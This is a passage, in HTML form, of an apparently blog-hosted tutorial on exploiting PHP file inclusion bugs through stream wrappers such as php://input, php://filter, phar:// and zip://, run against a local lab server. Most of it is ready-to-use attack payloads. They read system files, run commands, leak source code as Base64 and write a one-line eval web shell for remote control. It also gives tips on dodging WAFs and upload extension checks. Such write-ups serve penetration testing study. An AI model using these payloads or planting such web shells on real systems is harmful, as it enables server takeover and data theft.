&lt;span class="n"&gt;expect&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;// — Process interactive streams&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  file://
&lt;/h4&gt;

&lt;p&gt;The &lt;code&gt;file://&lt;/code&gt; pseudo-protocol accesses the local filesystem.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_include&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_fopen&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight perl"&gt;&lt;code&gt;&lt;span class="nv"&gt;fileinclude&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nv"&gt;php&lt;/span&gt;&lt;span class="p"&gt;?&lt;/span&gt;&lt;span class="nv"&gt;file&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;file:&lt;/span&gt;&lt;span class="sr"&gt;//&lt;/span&gt;&lt;span class="nv"&gt;C:&lt;/span&gt;&lt;span class="sr"&gt;/Windows/&lt;/span&gt;&lt;span class="nv"&gt;win&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nv"&gt;ini&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7ag697e406g6yuuc1ei0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7ag697e406g6yuuc1ei0.png" alt=" " width="800" height="322"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  php://input
&lt;/h4&gt;

&lt;p&gt;A read-only stream that exposes the raw body of the request, i.e. the unparsed POST data. It is not available when the request is sent with &lt;code&gt;enctype="multipart/form-data"&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;allow_url_include = On&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_fopen&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;fileinclude.php?file=php://input
# POST body:
&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt; &lt;span class="nb"&gt;phpinfo&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt; &lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi0uhfk9iah8vmqmreppt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi0uhfk9iah8vmqmreppt.png" alt=" " width="800" height="454"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h5&gt;
  
  
  Note: Bypassing &lt;code&gt;file_get_contents()&lt;/code&gt; with &lt;code&gt;php://input&lt;/code&gt;
&lt;/h5&gt;

&lt;p&gt;When encountering &lt;code&gt;file_get_contents()&lt;/code&gt;, consider using &lt;code&gt;php://input&lt;/code&gt; to bypass restrictions, as PHP pseudo-protocols can also handle HTTP, allowing POST data transfer.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;file_get_contents()&lt;/code&gt; returns the entire contents of a file as a string. Passing an arbitrary string that is not a path produces an error, but if the string is an HTTP URL the function fetches it much like &lt;code&gt;curl&lt;/code&gt; and returns what it reads. Because PHP's stream wrappers also understand HTTP, &lt;code&gt;php://input&lt;/code&gt; can be used to read the POST body and feed it into such a parameter.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Test code:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
    &lt;span class="k"&gt;echo&lt;/span&gt; &lt;span class="nb"&gt;file_get_contents&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"php://input"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Result:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp6giqctq4cl9i7t31iiq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp6giqctq4cl9i7t31iiq.png" alt=" " width="799" height="319"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  php://input (Command Execution)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;allow_url_include = On&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_fopen&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;fileinclude.php?file=php://input
# POST body:
&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt; &lt;span class="nb"&gt;system&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'whoami'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5qke8uoppgrjr2qqn6xi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5qke8uoppgrjr2qqn6xi.png" alt=" " width="799" height="318"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  php://input (Writing a Trojan)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;allow_url_include = On&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_fopen&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;fileinclude.php?file=php://input
# POST body:
&lt;span class="nt"&gt;&amp;lt;&lt;/span&gt;&lt;span class="err"&gt;?&lt;/span&gt;&lt;span class="na"&gt;php&lt;/span&gt; &lt;span class="na"&gt;fputs&lt;/span&gt;&lt;span class="err"&gt;(&lt;/span&gt;&lt;span class="na"&gt;fopen&lt;/span&gt;&lt;span class="err"&gt;('&lt;/span&gt;&lt;span class="na"&gt;hack.php&lt;/span&gt;&lt;span class="err"&gt;','&lt;/span&gt;&lt;span class="na"&gt;w&lt;/span&gt;&lt;span class="err"&gt;'),'&lt;/span&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt; &lt;span class="o"&gt;@&lt;/span&gt;&lt;span class="k"&gt;eval&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$_POST&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;v&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;&lt;span class="err"&gt;');?&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After execution, the web shell is created in the same directory:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fga3vehsx4zzioic6wq4m.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fga3vehsx4zzioic6wq4m.png" alt=" " width="721" height="324"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Using a shell management tool (e.g., AntSword), the connection succeeds.&lt;/p&gt;

&lt;h4&gt;
  
  
  php://filter
&lt;/h4&gt;

&lt;p&gt;A meta-wrapper that applies stream filters to a resource as it is opened. It can read and write files on the local disk.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_include&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_fopen&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;fileinclude.php?file&lt;span class="o"&gt;=&lt;/span&gt;php://filter/read&lt;span class="o"&gt;=&lt;/span&gt;convert.base64-encode/resource&lt;span class="o"&gt;=&lt;/span&gt;index.php
&lt;span class="c"&gt;# Alternative:&lt;/span&gt;
fileinclude.php?file&lt;span class="o"&gt;=&lt;/span&gt;php://filter/convert.base64-encode/resource&lt;span class="o"&gt;=&lt;/span&gt;index.php
&lt;span class="c"&gt;# (The second is shorter and may bypass some WAFs)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;By naming a file in the &lt;code&gt;resource=&lt;/code&gt; part, its source is returned Base64-encoded and can then be decoded. Even when this does not yield a shell directly, disclosure of source code and other sensitive files is a serious impact in its own right.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fryxszy3lisu5ptc8w9yi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fryxszy3lisu5ptc8w9yi.png" alt=" " width="799" height="318"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The string &lt;code&gt;PD9waHAKZWNobyAiSGVsbG8gV29ybGQiOwo/Pg==&lt;/code&gt; decodes to:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
&lt;span class="k"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"Hello World"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  phar://
&lt;/h4&gt;

&lt;p&gt;This pseudo-protocol reads files out of an archive. The archive is recognised by its content rather than its file extension, so any extension is accepted.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;PHP version &amp;gt;= 5.3.0&lt;/li&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_include&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_fopen&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Create a file &lt;code&gt;phpinfo.php&lt;/code&gt; with content &lt;code&gt;&amp;lt;?php phpinfo(); ?&amp;gt;&lt;/code&gt; and pack it into a ZIP archive:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9795lc6diut492bvy781.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9795lc6diut492bvy781.png" alt=" " width="800" height="300"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Specify the absolute path:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;fileinclude.php?file&lt;span class="o"&gt;=&lt;/span&gt;phar://D:/phpStudy/PHPTutorial/WWW/test.zip/phpinfo.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Or use a relative path (if &lt;code&gt;test.zip&lt;/code&gt; is in the same directory as &lt;code&gt;fileinclude.php&lt;/code&gt;):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;fileinclude.php?file&lt;span class="o"&gt;=&lt;/span&gt;phar://test.zip/phpinfo.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft63zlmspnmb3yacl6wol.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft63zlmspnmb3yacl6wol.png" alt=" " width="800" height="118"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;code&gt;test.zip&lt;/code&gt; must be a ZIP archive; other formats (RAR, 7z) do not work. However, the file extension can be changed to e.g., &lt;code&gt;test.jpg&lt;/code&gt; or &lt;code&gt;test.111&lt;/code&gt;. This bypasses upload restrictions.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwex09o557fr0uhl5p76c.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwex09o557fr0uhl5p76c.png" alt=" " width="799" height="259"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc7gj0n4dwt70nizbz5ip.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc7gj0n4dwt70nizbz5ip.png" alt=" " width="800" height="279"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h4&gt;
  
  
  phar:// (Command Execution)
&lt;/h4&gt;

&lt;p&gt;Same as &lt;code&gt;phar://&lt;/code&gt;, but with file content changed to &lt;code&gt;&amp;lt;?php system('whoami');?&amp;gt;&lt;/code&gt;.&lt;/p&gt;
&lt;h4&gt;
  
  
  phar:// (Writing a Trojan)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;PHP version &amp;gt;= 5.3.0&lt;/li&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_include&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_fopen&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Create a web shell &lt;code&gt;shell.php&lt;/code&gt; with content &lt;code&gt;&amp;lt;?php @eval($_POST[v]);?&amp;gt;&lt;/code&gt; and pack into a ZIP archive:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsz3c5ebl8uenwde1r0xc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsz3c5ebl8uenwde1r0xc.png" alt=" " width="800" height="167"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Absolute path:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;http://192.168.1.4/fileinclude.php?file&lt;span class="o"&gt;=&lt;/span&gt;phar://D:/phpStudy/PHPTutorial/WWW/test.zip/shell.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Relative path (if &lt;code&gt;test.zip&lt;/code&gt; in current directory):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;http://192.168.1.4/fileinclude.php?file&lt;span class="o"&gt;=&lt;/span&gt;phar://test.zip/shell.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After visiting the URL, the web shell is written. Then use a shell management tool (e.g., AntSword) to connect.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo7m1eglduxiglksz3xy8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo7m1eglduxiglksz3xy8.png" alt=" " width="800" height="463"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The same extension bypass applies: the archive can be renamed.&lt;/p&gt;

&lt;h4&gt;
  
  
  zip://
&lt;/h4&gt;

&lt;p&gt;The &lt;code&gt;zip://&lt;/code&gt; pseudo-protocol is similar to &lt;code&gt;phar://&lt;/code&gt;, but its path syntax differs.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;PHP version &amp;gt;= 5.3.0&lt;/li&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_include&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_fopen&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Construct a ZIP package similarly:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9795lc6diut492bvy781.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9795lc6diut492bvy781.png" alt=" " width="800" height="300"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;With &lt;code&gt;zip://&lt;/code&gt;, an absolute path is required. The separator between the archive and the inner file is &lt;code&gt;#&lt;/code&gt;, which must be URL-encoded as &lt;code&gt;%23&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight perl"&gt;&lt;code&gt;&lt;span class="nv"&gt;fileinclude&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nv"&gt;php&lt;/span&gt;&lt;span class="p"&gt;?&lt;/span&gt;&lt;span class="nv"&gt;file&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;zip:&lt;/span&gt;&lt;span class="sr"&gt;//&lt;/span&gt;&lt;span class="nv"&gt;D:&lt;/span&gt;&lt;span class="sr"&gt;/phpStudy/&lt;/span&gt;&lt;span class="nv"&gt;PHPTutorial&lt;/span&gt;&lt;span class="sr"&gt;/WWW/&lt;/span&gt;&lt;span class="nv"&gt;test&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nv"&gt;zip&lt;/span&gt;&lt;span class="o"&gt;%&lt;/span&gt;&lt;span class="mi"&gt;23&lt;/span&gt;&lt;span class="nv"&gt;phpinfo&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nv"&gt;php&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Relative paths cause inclusion failure.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The same extension bypass applies.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhn3bub17kv7zfdowt09f.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhn3bub17kv7zfdowt09f.png" alt=" " width="799" height="241"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  zip:// (Command Execution)
&lt;/h4&gt;

&lt;p&gt;Same as &lt;code&gt;zip://&lt;/code&gt;, with file content changed to &lt;code&gt;&amp;lt;?php system('whoami');?&amp;gt;&lt;/code&gt;.&lt;/p&gt;

&lt;h4&gt;
  
  
  zip:// (Writing a Trojan)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;PHP version &amp;gt;= 5.3.0&lt;/li&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_include&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_fopen&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Create a web shell &lt;code&gt;shell.php&lt;/code&gt; with content &lt;code&gt;&amp;lt;?php @eval($_POST[v]);?&amp;gt;&lt;/code&gt; and pack into a ZIP archive:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsz3c5ebl8uenwde1r0xc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsz3c5ebl8uenwde1r0xc.png" alt=" " width="800" height="167"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Absolute path:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight perl"&gt;&lt;code&gt;&lt;span class="nv"&gt;http:&lt;/span&gt;&lt;span class="sr"&gt;//&lt;/span&gt;&lt;span class="mf"&gt;192.168.1.4&lt;/span&gt;&lt;span class="sr"&gt;/fileinclude.php?file=zip://D:/p&lt;/span&gt;&lt;span class="nv"&gt;hpStudy&lt;/span&gt;&lt;span class="sr"&gt;/PHPTutorial/&lt;/span&gt;&lt;span class="nv"&gt;WWW&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="nv"&gt;test&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nv"&gt;zip&lt;/span&gt;&lt;span class="o"&gt;%&lt;/span&gt;&lt;span class="mi"&gt;23&lt;/span&gt;&lt;span class="nv"&gt;shell&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nv"&gt;php&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After visiting the URL, the web shell is written. Relative paths cause failure.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnqkzjbzj1kdfrdqzbyez.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnqkzjbzj1kdfrdqzbyez.png" alt=" " width="800" height="272"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzxs31yjbjaivqa3aqal6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzxs31yjbjaivqa3aqal6.png" alt=" " width="800" height="540"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  data://
&lt;/h4&gt;

&lt;p&gt;A data stream wrapper (RFC 2397) that makes the included content come from the URL itself, so the inclusion stream is entirely user-controlled. In simple terms, it includes whatever the user supplies inline.&lt;/p&gt;

